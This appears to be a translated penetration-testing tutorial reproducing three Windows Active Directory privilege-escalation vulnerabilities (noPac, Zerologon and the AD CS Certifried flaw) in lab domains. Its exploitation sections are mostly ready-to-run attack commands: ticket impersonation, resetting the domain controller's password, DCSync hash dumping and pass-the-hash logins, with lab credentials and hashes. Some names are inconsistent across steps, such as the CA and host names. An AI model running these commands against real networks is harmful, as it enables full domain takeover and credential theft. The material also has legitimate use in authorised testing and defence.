CVE-2021-42287#
Due to Active Directory not validating computer and server accounts in the domain, authenticated attackers can exploit this vulnerability to bypass complete restrictions, allowing them to elevate the permissions of ordinary domain users to domain administrator privileges and execute arbitrary code.
Exploitation Conditions#
Prerequisites: An ordinary account within the domain
Affected Versions: Almost the entire Windows series
Vulnerability Reproduction#
The current scenario is as follows: we have obtained the host permissions of the Web Server and the account and password of the domain member webadmin, to use the CVE-2021-42287 vulnerability to attack the domain controller host. Here we can use the nopac script for exploitation. Before the attack, bind the domain name and IP address in the hosts file.
Check for the existence of the vulnerability
noPac.exe scan -domain god.org -user webadmin -pass admin!@#45
The vulnerability exists. Next, we use the TGT of the ordinary domain user to exploit the vulnerability and request TGS for the domain controller machine account's cifs service ST credential.
noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org --impersonate administrator -dump -use-ldap
After generating the ticket, we check the tickets present on the current computer.
klist
We find a ticket established with the domain controller, and we can directly use psexec to connect.
PsExec \\owa2010cn-god.god.org cmd
CVE-2020-1472#
CVE-2020-1472 is one of the most severe remote privilege escalation vulnerabilities in Windows domain controllers. Attackers can exploit this vulnerability to gain domain admin access by establishing a vulnerable secure channel with the domain controller through NetLogon.
First, obtain the computer name of the domain controller.
net group "domain controllers" /domain
Then use a test script to check if the domain controller has the vulnerability.
python zerologon_tester.py owa2010cn-god 192.168.3.21
Then use the exploit to connect to the DC and clear the credentials.
python cve-2020-1472-exploit.py OWA2010CN-GOG 192.168.3.21
After execution, the DC's password will be cleared, and we can then connect with an empty password to export the hashes within the domain.
secretsdump.exe "god.org/owa2010cn-god$@192.168.3.21" -no-pass
At this point, we use the domain controller's hash to perform a Pass-the-Hash (PTH) connection to gain domain controller privileges.
wmiexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/admin
CVE-2022-26923#
This vulnerability allows low-privileged users to elevate their privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed. There are now very few medium to large Active Directory environments that do not have AD CS installed, making this vulnerability both dangerous and exploitable.
Exploitation Conditions#
Prerequisites:
- An ordinary account within the domain
- A certificate server exists within the domain
Affected Versions: Windows 8.1, Windows 10, Windows 11, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, etc.
Environment Setup#
First, prepare a host with domain services set up, here we choose Windows Server 2012 R2. Since this vulnerability is based on certificate services, Active Directory Certificate Services must be installed on the DC. Click to add roles and features, proceed with the default steps until the following image, and select to install Active Directory Certificate Services: Proceed to the role services, check Certificate Authority, Certificate Authority Web Enrollment, and Certificate Enrollment Policy Web Service!
Click install!
After installation, configure Active Directory Certificate Services by clicking that option in Server Manager. Select the three services checked during installation and proceed to the CA name!
After configuring the CA certificate, proceed to the server certificate!
In the server certificate, select the certificate and assign it for SSL later, click next!
Proceed to configure!
Check if the configuration was successful: Check if there are certificate templates in the Certificate Authority!
The exploitation condition for this vulnerability is to obtain an ordinary user permission within the domain, so a user needs to be created on the DC, and this user's credentials will be used for domain controller privilege escalation operations.
Vulnerability Exploitation#
Obtain CA Name#
Currently, our known information is:
Domain Controller: Win 2012
IP: 192.168.45.152
Hostname: DC-2012
Domain: tidesec.local
User: test/Pass123
Next, the first step is to obtain the CA name within the domain.
- Query from any domain host
Check if there is a certificate drive
Get-PSDrive cert | ft -AutoSize
List the certificates of local machine accounts
Get-ChildItem Cert:\LocalMachine\Root
- Query on the domain controller
certutil
certutil -config - -ping
3. Reasonable Guess Based on the domain controller hostname and domain name
Domain Controller Hostname: DC-2012
Domain Name: tidesec.local
CA Name: tidesec-DC-2012-CA
Apply for Certificate#
Before applying for a certificate, we need to modify the hosts file of our attacking machine to correspond the domain name and IP address.
vim /etc/hosts
192.168.45.152 tidesec.local
192.168.45.152 tidesec-DC-2012-CA
192.168.45.152 DC-2012.tidesec.local
Here we need to use the certipy tool, and install it before use.
python3 setup.py install
After installation, use the low-privileged user, CA name, and domain controller computer name we just obtained to generate a certificate.
certipy req tidesec.local'test:Pass123'@DC-2012.tidesec.local -ca tidesec-DC-2012-CA -template User
Successfully applied for the ceshi user certificate account, execute the command to verify the certificate and obtain its NT hash value.
certipy auth -pfx test.pfx
Successfully obtained the NT hash, indicating that the test environment is fine. Next, we need to use bloodyAD to create a machine account. Before creating the account, we first observe that there are no accounts under Computers on the current domain controller.
Next, create one.
python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 addComputer test2 'Test12345'
Now observe that a test2 machine account has been successfully added to the domain controller.
Next, set its dNSHostName attribute to the domain controller server attribute.
python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 setAttribute 'CN=test2,CN=Computers,DC=tidesec,DC=local' dNSHostName '["DC-2012.tidesec.local"]'
Next, we use the newly created machine account test2 to apply for a certificate, which is actually applying for the domain controller DC$ certificate.
certipy req 'tidesec.local/test2$:Test12345@192.168.45.152' -template Machine -dc-ip 192.168.45.152 -ca tidesec-DC-2021-CA
At this point, the certificate is not test.pfx, but the hostname dc-2012.pfx, which is issued for the domain controller's computer account certificate. Next, we use this certificate for authentication, and the Certipy tool retrieves the NTLM hash of DC-2012$.
certipy auth -pfx dc-2012.pfx -dc-ip 192.168.45.152
Then we can use the secretsdump.py script from the impacket toolkit to perform a DCSync attack and export the domain user hashes.
python3 secretsdump.py 'tidesec.local/DC-2012$@DC-2012.tidesec.local' -hashes :20d4bd2f70725811f4e39fe77166e00b
After that, use the wmiexec.py script to gain execution privileges for the domain controller account.
python3 wmiexec.py tidesec.local/administrator@192.168.45.152 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7